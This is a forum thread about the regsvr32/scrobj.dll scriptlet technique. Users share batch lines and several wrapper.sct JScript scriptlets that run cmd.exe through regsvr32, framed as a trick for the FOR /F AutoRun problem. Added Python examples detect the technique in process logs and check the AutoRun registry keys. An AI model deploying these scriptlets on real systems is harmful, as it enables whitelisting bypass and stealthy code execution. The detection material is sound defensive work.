
Regsrv32 exploit

Posted: 26 Apr 2016 04:58
by npocmaka_

Re: Regsrv32 exploit

Posted: 26 Apr 2016 14:08
by jeb
Nice, I tested it and it works :D

But I can't see a possibility to add parameters to the regsvr32 line.

As regsvr32 accepts a /c option, this could be useful for the FOR/F problem with autorun (SO: How to specify /D in FOR command?).

Something like


set "comspec=C:\windows\system32\regsvr32.exe"
set "WRAP=/s /n /u /i:file:///%~dp0wrapper.sct scrobj.dll"
for /F "delims=" %%A in ('%WRAP% echo %TIME%') do echo #%%A


But the wrapper.sct doesn't see the DIR command (currently).

wrapper.sct


<?XML version="1.0"?>
<scriptlet>
<registration
    progid="Empire"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
   <!-- Proof Of Concept - Casey Smith @subTee -->
   <script language="JScript">
      <![CDATA[
   
         var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c");   
   
      ]]>
</script>
</registration>
</scriptlet>


The problem is, that it expands to


regsvr32.exe /s /n /u /i:file:///c:\temp\wrapper.sct scrobj.dll echo 17:55:00

But wrapper.sct will not see the "echo 17:55:00"

Re: Regsrv32 exploit

Posted: 27 Apr 2016 06:43
by npocmaka_
jeb wrote: Nice, I tested it and it works :D
...


The bad thing is that the sct does not recognize WScript.Arguments, nor can it handle ('Scripting.FileSystemObject').GetStandardStream(1/0), because it is regsvr32 that starts the file...

Re: Regsrv32 exploit

Posted: 27 Apr 2016 15:24
by npocmaka_
But environment variables can be expanded in the sct file:


set "wcom=pause"
set "comspec=C:\windows\system32\regsvr32.exe"
set "WRAP=/s /n /u /i:file:///%~dp0wrapper.sct scrobj.dll"
for /F "delims=" %%A in ('%WRAP%') do echo #%%A



and the wrapper:


<?XML version="1.0"?>
<scriptlet>
<registration
    progid="Empire"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
   <!-- Proof Of Concept - Casey Smith @subTee -->
   <script language="JScript">
      <![CDATA[
      var r = new ActiveXObject("WScript.Shell");
      var command=r.ExpandEnvironmentStrings("%wcom%");
      r.Run("cmd.exe /c " + command);   
   
      ]]>
</script>
</registration>
</scriptlet>

Re: Regsrv32 exploit

Posted: 27 Apr 2016 16:17
by npocmaka_
If the WScript.Shell Exec() method is used instead of Run(), the output can be read:


@echo off
set "wcom=echo --#--&pause"
::set "comspec=C:\windows\system32\regsvr32.exe"
set "WRAP=/s /n /u /i:file:///%~dp0wrapper.sct scrobj.dll"
for /F "delims=" %%A in ('%WRAP%') do echo #%%A
regsvr32 /s /n /u /i:file:///%~dp0wrapper.sct scrobj.dll |more


and the wrapper:


<?XML version="1.0"?>
<scriptlet>
<registration
    progid="Empire"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
   <!-- Proof Of Concept - Casey Smith @subTee -->
   <script language="JScript">
      <![CDATA[
      var r = new ActiveXObject("WScript.Shell");
      var command=r.ExpandEnvironmentStrings("%wcom%");
      var res=r.Exec("cmd.exe /c " + command);
      
        new ActiveXObject('Scripting.FileSystemObject').GetStandardStream(1).Write(res.StdOut.ReadLine());   
   
      ]]>
</script>
</registration>
</scriptlet>

Re: Regsrv32 exploit

Posted: 28 Apr 2016 04:43
by jeb
Nice work.

I changed the wrapper.sct to support more than one line of output.


<?XML version="1.0"?>
<scriptlet>
<registration
    progid="Empire"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
   <!-- Proof Of Concept - Casey Smith @subTee -->
   <script language="JScript">
      <![CDATA[
      var r = new ActiveXObject("WScript.Shell");
      var command=r.ExpandEnvironmentStrings("%wcom%");
      var res=r.Exec("cmd.exe /c \"" + command + "\"");
     
        var stdout=new ActiveXObject('Scripting.FileSystemObject').GetStandardStream(1);
      while ( !res.StdOut.AtEndOfStream)
      {
         stdout.WriteLine(res.StdOut.ReadLine() );
      }
      ]]>
</script>
</registration>
</scriptlet>
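For whoever has to spot this from the defensive side: the expanded command line jeb quoted earlier in the thread is exactly what lands in process-creation telemetry (Sysmon event 1, or Windows 4688 with command-line auditing enabled), and the distinctive parts are regsvr32 loading scrobj.dll and an /i: argument that is a URL or a .sct file. The Python below is an added example, not code from this thread or from anyone posting in it. The event records are constructed samples, and the field names image, parent and cmdline are assumptions about whatever log format you feed it.

```python
import re

# Constructed sample process-creation records (image, parent, command line).
# These are made-up lines for the example, not telemetry from the thread.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\regsvr32.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"regsvr32.exe /s /n /u /i:file:///c:\temp\wrapper.sct scrobj.dll"},
    {"image": r"C:\Windows\System32\regsvr32.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"regsvr32 /s /n /u /i:http://example.invalid/payload.sct scrobj.dll"},
    {"image": r"C:\Windows\System32\regsvr32.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\vendorctl.dll"'},
    {"image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"cmd.exe /c echo hello"},
]

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmdline):
    """Split a Windows command line on whitespace, honouring double quotes."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]


def regsvr32_indicators(event):
    """Return the reasons this record looks like a regsvr32 scriptlet
    invocation; an empty list means nothing stands out (or not regsvr32)."""
    if not event["image"].lower().endswith("\\regsvr32.exe"):
        return []
    args = tokenize(event["cmdline"])[1:]          # drop argv[0]
    switches = {a.lower()[:2] for a in args if a.startswith("/")}
    install = [a[3:] for a in args if a[:3].lower() == "/i:"]
    modules = [a for a in args if not a.startswith("/")]
    reasons = []
    if any(m.lower().endswith("scrobj.dll") for m in modules):
        reasons.append("loads scrobj.dll (scriptlet COM host) instead of a normal COM server")
    for target in install:
        if re.match(r"(?i)^(https?|file)://", target):
            reasons.append("/i: argument is a URL: " + target)
        if target.lower().endswith(".sct"):
            reasons.append("/i: argument is a .sct scriptlet: " + target)
    if "/n" in switches and install and modules:
        # weaker indicator: /n skips DllRegisterServer and hands the /i: string to DllInstall
        reasons.append("/n with /i: runs DllInstall only, no DllRegisterServer call")
    return reasons


def scan(events):
    """Return [(cmdline, reasons)] for every event with at least one indicator."""
    hits = []
    for ev in events:
        reasons = regsvr32_indicators(ev)
        if reasons:
            hits.append((ev["cmdline"], reasons))
    return hits


if __name__ == "__main__":
    for cmdline, reasons in scan(SAMPLE_EVENTS):
        print(cmdline)
        for r in reasons:
            print("   -", r)
```

The third sample, a vendor DLL registered with /s, produces no indicator at all, which is the point: the check keys on the scriptlet-specific parts of the command line rather than on regsvr32 itself, since regsvr32 runs constantly on a normal machine. The /n-with-/i: rule is deliberately listed last, as a supporting indicator only, because legitimate DllInstall-only registrations use the same switches.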

Re: Regsrv32 exploit

Posted: 06 May 2016 13:02
by Sponge Belly
Hi Guys! :)

Fascinating discovery, but not even MS can ignore a security hole that big. No doubt it will be patched in an upcoming update. I’m more concerned with the AUTORUN issue, which I was unaware of until now.

Short of querying the Registry to make sure the AUTORUN key is empty whenever I want to use a for /f loop, what can I do about it? :?

Any suggestions appreciated.

- SB

Re: Regsrv32 exploit

Posted: 12 May 2016 02:06
by npocmaka_
Sponge Belly wrote: Hi Guys! :)

Short of querying the Registry to make sure the AUTORUN key is empty whenever I want to use a for /f loop, what can I do about it? :?

Any suggestions appreciated.

- SB


What is this about? Can you give more info?

Re: Regsrv32 exploit

Posted: 29 May 2016 02:29
by Ed Dyreen
It looks interesting, but I don't understand this. What can a person do with this? How is this a security hole?

Re: Regsrv32 exploit

Posted: 01 Jul 2016 15:30
by Sponge Belly
Hi Vasil,

Sorry for the delay in replying. I was referring to the SO link Jeb mentioned in his reply to the OP. If I understand correctly, the following Registry keys are queried every time a for /f loop is executed:


HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun


There is no way to prevent this short of using the wrapper developed by Jeb and yourself.

So my question is, how can I do the following?

  • Check if the Registry keys have values.
  • If true, save the values to temp variables, and delete the keys.
  • Execute my for /f loops safely.
  • Restore original values of keys.

Can a Batch file do this without triggering the UAC prompt? And finally, isn’t this an awful lot of work to handle a situation which will probably never arise?

Thanks! :)

- SB

Re: Regsrv32 exploit

Posted: 03 Jul 2016 06:08
by foxidrive
Is this for your own use on your PC or is it to run on any persons PC?

Test this code to see if anything is printed to the screen above the 'press any key' prompt.
If reg query doesn't raise a UAC prompt then you can use it to set a variable to anything that is in these keys.


@echo off
reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor" /v AutoRun 2>nul
reg query "HKEY_CURRENT_USER\Software\Microsoft\Command Processor" /v AutoRun 2>nul
pause & goto :EOF
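Sponge Belly's first step, checking whether either AutoRun value is set, can be done with the two reg query lines above without an elevation prompt: reading both hives works as a standard user, and it is only clearing the HKLM value that needs an administrator (HKCU is writable by the user). The Python below is an added example, not code from this thread, that runs those two queries and parses their output. The sample output strings are constructed to match the layout reg query prints, and on anything other than Windows only the parsing functions are usable.

```python
import re
import subprocess

# The two keys from the thread; cmd.exe runs whatever AutoRun holds on every start,
# including the child cmd.exe that FOR /F spawns.
AUTORUN_KEYS = (
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor",
    r"HKEY_CURRENT_USER\Software\Microsoft\Command Processor",
)

# Constructed sample output in the layout `reg query <key> /v AutoRun` prints:
# a blank line, the key path, then "    <name>    <type>    <data>".
# An absent value prints only an error on stderr, so its stdout is empty.
SAMPLE_OUTPUT = {
    AUTORUN_KEYS[0]: "",
    AUTORUN_KEYS[1]: r"""
HKEY_CURRENT_USER\Software\Microsoft\Command Processor
    AutoRun    REG_SZ    echo AutoRun fired

""",
}

_VALUE_LINE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_\w+)\s*(?P<data>.*)$")


def parse_reg_query(output):
    """Map value names (lower-cased, as the registry is case-insensitive)
    to (type, data) from the text reg query printed for one key."""
    values = {}
    for line in output.splitlines():
        m = _VALUE_LINE.match(line)
        if m:
            values[m.group("name").lower()] = (m.group("type"), m.group("data").strip())
    return values


def autorun_commands(outputs):
    """outputs: {key_path: reg query text}. Returns {key_path: command} for
    every hive whose AutoRun value holds a non-empty command."""
    found = {}
    for key, text in outputs.items():
        entry = parse_reg_query(text).get("autorun")
        if entry and entry[1]:
            found[key] = entry[1]
    return found


def query_autorun_keys():
    """Windows only: run reg query for both hives and collect their stdout."""
    outputs = {}
    for key in AUTORUN_KEYS:
        proc = subprocess.run(["reg", "query", key, "/v", "AutoRun"],
                              capture_output=True, text=True)
        outputs[key] = proc.stdout        # stderr (the "unable to find" error) is dropped
    return outputs


if __name__ == "__main__":
    try:
        live = query_autorun_keys()
    except FileNotFoundError:             # no reg.exe here: use the constructed sample
        live = SAMPLE_OUTPUT
    hits = autorun_commands(live)
    if not hits:
        print("No AutoRun command configured in either hive")
    for key, command in hits.items():
        print(f"{key}\n    AutoRun = {command}")
```

A REG_EXPAND_SZ value comes back unexpanded, exactly as reg query prints it, which is what you want when the goal is to save and later restore the original string rather than to run it.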

Re: Regsrv32 exploit

Posted: 05 Sep 2016 10:39
by Sponge Belly
Hi Foxi,

Thanks for your helpful suggestion and sorry for not replying sooner. I’ve been wracking my brains over this and I haven’t been able to come up with a practical solution. :(

Ideally, I want to write robust code that will work on all versions of Windows and won’t be tripped up by gotchas like commands stored in the AutoRun keys. But it’s such an unlikely edge case that the cost of regularly checking for it isn’t worth the effort.

- SB

PS: Maybe this is something your script to gather information could check for?